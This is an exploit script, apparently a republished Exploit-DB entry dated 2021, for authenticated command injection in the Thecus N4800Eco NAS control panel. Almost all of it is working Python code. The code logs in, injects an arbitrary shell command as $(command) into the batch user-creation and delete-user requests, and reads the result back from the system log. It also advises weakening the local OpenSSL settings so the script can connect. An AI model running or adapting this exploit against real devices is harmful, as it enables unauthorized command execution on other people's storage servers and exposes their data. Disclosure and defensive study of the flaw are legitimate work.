Thecus N4800Eco Nas Server Control Panel – Comand Injection

• Exploit Database
• 41 阅读

• 作者： Metin Yunus Kandemir
  日期： 2021-06-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49926/

• # Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
  # Date: 01/06/2021
  # Exploit Author: Metin Yunus Kandemir
  # Vendor Homepage: http://www.thecus.com/
  # Software Link: http://www.thecus.com/product.php?PROD_ID=83
  # Version: N4800Eco
  # Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
  
  
  #!/usr/bin/python3
  import requests
  import sys
  import urllib3
  
  
  # To fix SSL error that occurs when the script is started.
  # 1- Open /etc/ssl/openssl.cnf file
  # At the bottom of the file:
  # [system_default_sect]
  # MinProtocol = TLSv1.2
  # CipherString = DEFAULT@SECLEVEL=2
  # 2- Set value of MinProtocol as TLSv1.0
  
  
  def readResult(s, target):
  d = {
  "fun": "setlog",
  "action": "query",
  "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
  }
  url = "http://" + target + "/adm/setmain.php"
  resultReq = s.post(url, data=d, verify=False)
  dict = resultReq.text.split()
  print("[+] Reading system log...\n")
  print(dict[5:8]) #change this range to read whole output of the command
  
  def delUser(s, target, command):
  d = {
  "action": "delete",
  "username": "$("+command+")"
  }
  url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
  delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
  
  if 'Local User remove succeeds' in delUserReq.text:
  print('[+] %s command was executed successfully' % command)
  else:
  print('[-] %s command was not executed!' %command)
  sys.exit(1)
  readResult(s, target)
  
  def addUser(s, target, command):
  d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
  url = "http://" + target + "/adm/setmain.php?fun=setbatch"
  addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
  
  if 'Users and groups were created successfully.' in addUserReq.text:
  print('[+] Users and groups were created successfully')
  else:
  print('[-] Users and groups were not created')
  sys.exit(1)
  delUser(s, target, command)
  
  def login(target, username, password, command=None):
  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  s = requests.Session()
  d = {
  "&eplang": "english",
  "p_pass": password,
  "p_user": username,
  "username": username,
  "pwd": password,
  "action": "login",
  "option": "com_extplorer"
  }
  url = "http://" + target + "/adm/login.php"
  loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
  
  if '"success":true' in loginReq.text:
  print('[+] Authentication successful')
  elif '"success":false' in loginReq.text:
  print('[-] Authentication failed!')
  sys.exit(1)
  else:
  print('[-] Something went wrong!')
  sys.exit(1)
  addUser(s, target, command)
  
  def main(args):
  if len(args) != 5:
  print("usage: %s targetIp:port username password command" % (args[0]))
  print("Example 192.168.1.13:80 admin admin id")
  sys.exit(1)
  login(target=args[1], username=args[2], password=args[3], command=args[4])
  
  
  if __name__ == "__main__":
  main(args=sys.argv)